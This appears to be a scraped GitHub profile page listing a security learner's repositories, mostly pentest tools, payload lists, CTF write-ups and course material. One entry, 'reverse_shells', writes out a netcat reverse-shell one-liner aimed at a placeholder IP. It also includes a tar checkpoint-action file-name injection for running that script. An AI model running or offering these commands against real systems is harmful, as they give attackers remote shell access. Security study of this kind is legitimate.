Abdullah Baghuth (0xCyberY)

0xCyberY

Geek Repo

Company:/dev/null

Location:127.0.0.1

Home Page:https://0xcybery.github.io

Twitter:@0xCyberY

Github PK Tool:Github PK Tool

Abdullah Baghuth's repositories

Buffer-Overflow-Prep

Windows 7 VM with Immunity Debugger and Putty preinstalled.

Language:PythonStargazers:1Issues:1Issues:0

impacket

Impacket is a collection of Python classes for working with network protocols.

Language:PythonLicense:NOASSERTIONStargazers:1Issues:0Issues:0

PayloadsAllTheThings

A list of useful payloads and bypass for Web Application Security and Pentest/CTF

License:MITStargazers:1Issues:0Issues:0

ArabicWebAppsPentesting

This repo will contain POC, demo files, and any links given during the Arab web application penetration testing course.

Language:PHPLicense:GPL-3.0Stargazers:0Issues:0Issues:0

Armstrong-numbers-

Armstrong number is a number that is equal to the sum of cubes of its digits. For example 0, 1, 153, 370, 371 and 407 are the Armstrong numbers.

Language:C++Stargazers:0Issues:1Issues:0

AutoRecon

AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.

Language:PythonLicense:GPL-3.0Stargazers:0Issues:0Issues:0

breach-parse

A tool for parsing breached passwords

Stargazers:0Issues:0Issues:0

buffer-overflow-linux-64-bit

buffer overflow linux 64 bit

Language:PythonStargazers:0Issues:1Issues:0

CaptureTheFlag-walkthroughs

CTF writeups - Tryhackme, HackTheBox, Vulnhub

Language:RoffStargazers:0Issues:0Issues:0

CheatSheetSeries

The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics.

License:NOASSERTIONStargazers:0Issues:0Issues:0
Language:C++Stargazers:0Issues:1Issues:0

Gf-Patterns

GF Paterns For (ssrf,RCE,Lfi,sqli,ssti,idor,url redirection,debug_logic, interesting Subs) parameters grep

License:MITStargazers:0Issues:0Issues:0

github-markdown-toc

Easy TOC creation for GitHub README.md

License:MITStargazers:0Issues:0Issues:0

GTFOBins.github.io

Curated list of Unix binaries that can be exploited to bypass system security restrictions

License:GPL-3.0Stargazers:0Issues:0Issues:0

hackthebox-writeups

Writeups for HacktheBox 'boot2root' machines

License:GPL-3.0Stargazers:0Issues:0Issues:0

Infoga

Infoga - Email OSINT

License:GPL-3.0Stargazers:0Issues:0Issues:0

Interactive-Terminal-Spawned-via-Python

Identifies when a terminal (tty) is spawned via Python. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host.

Stargazers:0Issues:0Issues:0

juice-shop

OWASP Juice Shop: Probably the most modern and sophisticated insecure web application

Language:JavaScriptLicense:MITStargazers:0Issues:0Issues:0

Matrix-Addition

This program will preform Matrix Addition using C ,

Language:CStargazers:0Issues:0Issues:0
Stargazers:0Issues:0Issues:0

pentesting-scripts

Useful scripts for pen testing. Require modification to run

Language:PythonStargazers:0Issues:0Issues:0

Practical-Ethical-Hacking-Resources

Compilation of Resources from TCM's Practical Ethical Hacking Udemy Course

Language:PythonStargazers:0Issues:0Issues:0

privilege-escalation-awesome-scripts-suite

PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)

License:MITStargazers:0Issues:0Issues:0

Python-assisted-exploitation

https://my.ine.com/CyberSecurity/courses/5810c2ff/penetration-testing-preliminary-skills-programming

Language:PythonStargazers:0Issues:1Issues:0

reverse_shells

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip> 1234 >/tmp/f" > shell.sh touch "/var/www/html/--checkpoint-action=exec=sh shell.sh" touch "/var/www/html/--checkpoint=1"

Stargazers:0Issues:0Issues:0

social-engineer-toolkit

The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here.

Stargazers:0Issues:0Issues:0

SQL-injection

Port Swigger SQL injection Lab Solutions

Stargazers:0Issues:1Issues:0

xss-payload-list

🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List

License:MITStargazers:0Issues:0Issues:0

ysoserial

A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

License:MITStargazers:0Issues:0Issues:0